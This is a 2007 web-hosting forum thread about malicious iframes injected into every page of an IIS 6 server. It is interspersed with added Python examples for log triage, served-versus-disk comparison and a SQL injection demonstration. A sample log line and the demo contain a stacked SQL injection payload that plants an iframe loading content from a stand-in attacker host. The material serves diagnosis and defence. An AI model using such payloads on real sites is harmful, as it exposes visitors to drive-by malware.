
Virus Attack on web server

Iframe code getting added to each page request


Jalinder

7:25 pm on Mar 12, 2007 (gmt 0)

10+ Year Member



We are facing a virus attack that is injecting a line of HTML above all other HTML for each page request. The code is an iframe whose src is a virus-hosting site that tries to install malicious software on the user's computer.

Anyone had such experience before?

Also, please recommend a good anti-virus program for Windows Server 2003. This is for a dedicated web server (IIS 6 on Windows 2003 Server).

Thanks in advance.

Ocean10000

9:38 pm on Mar 12, 2007 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



(1) The question that comes to mind is: how are they injecting it into the website? Has your server been compromised?
(2) And what are you doing to stop it?

Can you give us a little more detail without breaking anything in the TOS, so we can get a better handle on what is going on in your situation?

Jalinder

10:20 pm on Mar 12, 2007 (gmt 0)

10+ Year Member



We ran anti-virus scans, changed our passwords, etc. For now seems the problem is over, but I wanted to understand it better, and get a good anti-virus to avoid such problems in future.

Jalinder

10:24 pm on Mar 12, 2007 (gmt 0)

10+ Year Member



The line did not get injected in each file. The files were intact. But the extra HTML appeared on browser. Perhaps injection was at the IIS level. This happened to all websites hosted on this web server and to all URLs of each website.

Ocean10000

11:37 pm on Mar 12, 2007 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



Did the virus scan turn up any viruses?
Did you check the logs to see what information you could gather on how they got into your machine to do this?
NT audit logs
IIS web logs
HTTP error logs (IIS 6 and up)

Basically, changing the passwords will only get you so far. If they exploited a program on the server, more than likely they can do it again, and you will end up in the same situation.

There is always the possibility that the attackers installed a rootkit on your machine, and anything you do besides a full format/reinstall might not be able to remove it.
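Ocean10000's log-checking step, worked through as an added example (this is not code from the thread): a parser for IIS 6 W3C extended log lines that keys the columns off the `#Fields:` header rather than fixed positions, followed by a first-pass triage that flags the request patterns worth reading first when you are hunting for the entry vector. The log lines, the field selection, the `attacker.example` host and the TEST-NET client addresses are all constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample in IIS 6 W3C extended format: a header block, then
# space-separated rows where '-' stands for an empty field and spaces
# inside a value (the User-Agent) are written as '+'.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2007-03-13 05:10:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2007-03-13 05:10:01 192.0.2.10 GET /default.asp - 80 - 198.51.100.7 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2007-03-13 05:10:03 192.0.2.10 GET /products.asp id=17 80 - 198.51.100.7 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2007-03-13 05:11:40 192.0.2.10 GET /products.asp id=17;UPDATE+pages+SET+body=body%2B'<iframe+src=http://attacker.example/x.htm>'-- 80 - 203.0.113.55 - 200 0 0
2007-03-13 05:12:02 192.0.2.10 POST /admin/login.asp - 80 - 203.0.113.55 - 500 0 0
"""

# SQL keywords and the comment marker that rarely belong in a query string.
SQL_PAT = re.compile(r"(?i)\b(union|select|insert|update|delete|exec|declare|cast)\b|--")


def parse_w3c(text):
    """Return one dict per data row, keyed by the names in the #Fields: line."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # IIS may emit a new header mid-file
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before any #Fields: header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue                       # truncated line: skip, never misalign
        rows.append(dict(zip(fields, values)))
    return rows


def suspicious(rows):
    """Flag rows with SQL or markup in the query, or failing POSTs.

    Returns (client ip, uri stem, [reasons]) per flagged row, in log order.
    """
    findings = []
    for r in rows:
        q = r.get("cs-uri-query", "-")
        decoded = unquote(q).replace("+", " ") if q != "-" else ""
        reasons = []
        if SQL_PAT.search(decoded):
            reasons.append("sql-keywords-in-query")
        if "<" in decoded:
            reasons.append("markup-in-query")
        if r.get("cs-method") == "POST" and r.get("sc-status", "").startswith("5"):
            reasons.append("post-with-server-error")
        if reasons:
            findings.append((r["c-ip"], r["cs-uri-stem"], reasons))
    return findings


def by_client(findings):
    """Count flagged requests per client address; the noisiest IP is the first lead."""
    counts = {}
    for ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = suspicious(parse_w3c(SAMPLE_LOG))
    for ip, stem, why in hits:
        print(ip, stem, ", ".join(why))
    print(by_client(hits))
```

Point it at the real `ex*.log` files under `%SystemRoot%\system32\LogFiles\W3SVC*` and widen the patterns as you learn what the attacker actually sent; the value of the `#Fields:` handling is that it keeps working when someone has changed the logged columns in the site properties.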

Jalinder

5:15 am on Mar 13, 2007 (gmt 0)

10+ Year Member



Yes, the problem is occurring again and again. Format seems to be the only way out.

Jalinder

6:14 am on Mar 13, 2007 (gmt 0)

10+ Year Member



We scanned using F-secure anti-virus, but the problem persists. F-secure scan did not find any malicious program on the system.

Jalinder

7:44 am on Mar 13, 2007 (gmt 0)

10+ Year Member



Anyone had similar experience before?

mattur

9:14 am on Mar 13, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Try searching with the URL, iframe and IIS keywords to find other reports. As Ocean10000 says, check your logs to see if you can identify its attack vector. If you can identify what it is, you will be able to ascertain how it got on your server.

I would reformat and reinstall to be sure, then it is essential you patch and lock down the system, and then keep up to date with patches.

Jalinder

12:15 pm on Mar 13, 2007 (gmt 0)

10+ Year Member



Thanks for the guidance

mattur

1:06 pm on Mar 13, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



The exploit that appears to match your description is JS.toofer [www3.ca.com]. It works by setting up a footer included in all IIS-served pages. The footer is JavaScript that opens an iframe linked to malicious content.

AV software installed on your server won't necessarily protect against attacks where the server is compromised, you have to lockdown the box (see Securing IIS6 [microsoft.com]) and keep up-to-date with patches.

I think you should be able to check the footer setting in IIS MSC, it's in "Web site properties" -> "Documents" tab -> "Enable document footer" on IIS5. HTH.

Jalinder

4:56 pm on Mar 13, 2007 (gmt 0)

10+ Year Member



Thanks very much for taking time to reply.

Footer settings in IIS are not modified. Moreover, the extra line is at the top. Most probably this virus is the latest version of JS.Toofer.

JS.Toofer used to modify the physical file on the server. But in our case the HTML gets added even though it does not exist in the file.

When we start the WWW service, pages work fine for a few minutes, and then at random it starts inserting the extra HTML line. So the HTML may appear sometimes and not at other times; it is certainly not coming from the file itself, but from somewhere else, at the IIS level.

Moreover, this happens for not just one but all sites hosted on the server.

Updates we do regularly. The Securing IIS link will certainly help.

The problem still exists, so we are having to keep our sites down until we find the problem.
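Jalinder's observation (file on disk intact, extra HTML only in what the browser receives) and mattur's footer tip both come down to one question: where in the response does the foreign content sit? As an added example, not code from the thread, the following compares the on-disk file with the body the server actually returns and classifies the difference. Content added before the file points at something in the request pipeline (a filter, an ISAPI extension, or in-memory injection); content added after it is exactly what the IIS document footer would produce; content spliced into the middle means the file, a template or a database field was changed. The sample HTML and the `attacker.example` host are constructed; `own_hosts` is a name assumed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed samples: what is on disk, and what the server handed out.
DISK_HTML = "<html><head><title>Shop</title></head><body><h1>Welcome</h1></body></html>"
SERVED_HTML = ('<iframe src="http://attacker.example/x.htm" width=1 height=1></iframe>\n'
               + DISK_HTML)


class IframeCollector(HTMLParser):
    """Collect the src of every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def iframe_sources(html):
    p = IframeCollector()
    p.feed(html)
    return p.srcs


def injected_segments(disk, served):
    """Return (prefix, suffix) the server wrapped around the on-disk file,
    or None when the served body is not the disk file with bytes added at
    the ends (the file itself, a template or stored data changed instead)."""
    idx = served.find(disk)
    if idx < 0:
        return None
    return served[:idx], served[idx + len(disk):]


def assess(disk, served, own_hosts):
    """Classify where the foreign content was added and list iframes that
    point off-site. own_hosts: hostnames that legitimately serve your frames."""
    seg = injected_segments(disk, served)
    foreign = []
    for src in iframe_sources(served):
        host = urlsplit(src).hostname          # None for a relative src
        if host is not None and host not in own_hosts:
            foreign.append(src)
    if seg is None:
        where = "file-or-data-modified"    # inspect file, templates, DB content
    elif seg[0] and not seg[1]:
        where = "prepended"                # request pipeline / in-memory injection
    elif seg[1] and not seg[0]:
        where = "appended"                 # matches an IIS document footer
    elif seg[0] or seg[1]:
        where = "wrapped"
    else:
        where = "clean"
    return where, foreign


if __name__ == "__main__":
    print(assess(DISK_HTML, SERVED_HTML, {"www.shop.example"}))
```

In practice, read `disk` from the site's home directory and fetch `served` over HTTP from a separate machine, repeating every few minutes, since the thread reports the injection appearing only some time after the WWW service starts; a single clean fetch proves nothing.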

LifeinAsia

5:35 pm on Mar 13, 2007 (gmt 0)

WebmasterWorld Administrator lifeinasia is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month



Just a thought- are you getting reports from your visitors seeing the same behavior, or have you just seen it from your own computer(s)? Any possibility the virus is on your computers and not the server?

Jalinder

5:53 pm on Mar 13, 2007 (gmt 0)

10+ Year Member



Yes, we received phone calls and emails from visitors; that's why we prefer to keep the sites shut until the problem is solved.

Ocean10000

7:57 pm on Mar 13, 2007 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



This could be an issue of an injection attack on your server that's only in memory. That is, when you reset IIS it clears out the worm code, but a few minutes later it is reinfected with the worm, usually because another infected server is scanning and infecting other servers. You might look up parts of the injected iframe, as someone already said, in a search engine and see what you can find out about this issue.

MidwestWebGuy

7:48 pm on Mar 16, 2007 (gmt 0)

10+ Year Member



This exact thing happened where I work. It turned out that it was a SQL injection. That's why the code never showed anything in particular, but when the data from the DB was pulled, the code was then injected.
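MidwestWebGuy's case, worked through as an added example that is not code from the thread: the pages on disk stay clean because the iframe lives in a database column, and every page that renders that row carries it. The vulnerable lookup concatenates the request parameter into the query the way classic ASP code often did (`"... WHERE id = " & Request("id")`), so a stacked `UPDATE` in that parameter rewrites the stored content; the safe version validates and parameterises. The `pages` table, the `run_stacked` helper and the `attacker.example` host are constructed for the example. SQLite stands in for SQL Server here; its `execute()` refuses stacked statements, which is why the helper splits the batch itself.

```python
import sqlite3

IFRAME = '<iframe src="http://attacker.example/x.htm" width="1" height="1"></iframe>'

# Stacked-statement payload supplied as the page id: the SELECT matches
# nothing, the UPDATE appends the iframe to every row the site renders.
PAYLOAD = "0; UPDATE pages SET body = body || '" + IFRAME + "'"


def fresh_db():
    """In-memory stand-in for the site's content database (constructed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)",
                   [(1, "<p>Home</p>"), (2, "<p>Products</p>")])
    db.commit()
    return db


def run_stacked(db, sql):
    """Model an ADO/SQL Server batch, which runs every statement it is given.
    Naive ';' split: enough for this demo, not a SQL parser."""
    rows = []
    for stmt in filter(None, (s.strip() for s in sql.split(";"))):
        rows = db.execute(stmt).fetchall()
    db.commit()
    return rows


def page_body_vulnerable(db, page_id):
    """String-built query: whatever is in page_id becomes part of the SQL."""
    rows = run_stacked(db, "SELECT body FROM pages WHERE id = " + page_id)
    return rows[0][0] if rows else None


def page_body_safe(db, page_id):
    """Validate the type, then bind the value; SQL text never changes shape."""
    pid = int(page_id)            # ValueError for anything but a whole number
    row = db.execute("SELECT body FROM pages WHERE id = ?", (pid,)).fetchone()
    return row[0] if row else None


def find_stored_iframes(db):
    """The check to run on the real database: ids of rows carrying an <iframe>."""
    return [r[0] for r in db.execute(
        "SELECT id FROM pages WHERE body LIKE '%<iframe%' ORDER BY id")]


if __name__ == "__main__":
    db = fresh_db()
    page_body_vulnerable(db, PAYLOAD)          # one poisoned request
    print(page_body_vulnerable(db, "1"))       # every later page carries the iframe
    print(find_stored_iframes(db))
```

The same `LIKE '%<iframe%'` sweep, run across every text column of the real database, is the quickest way to tell this case apart from an in-memory or footer injection: if the markup is in the data, cleaning the server will not remove it.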

AffiliateDreamer

6:32 pm on Mar 18, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Why not format the server?

Did you keep up with the patches?
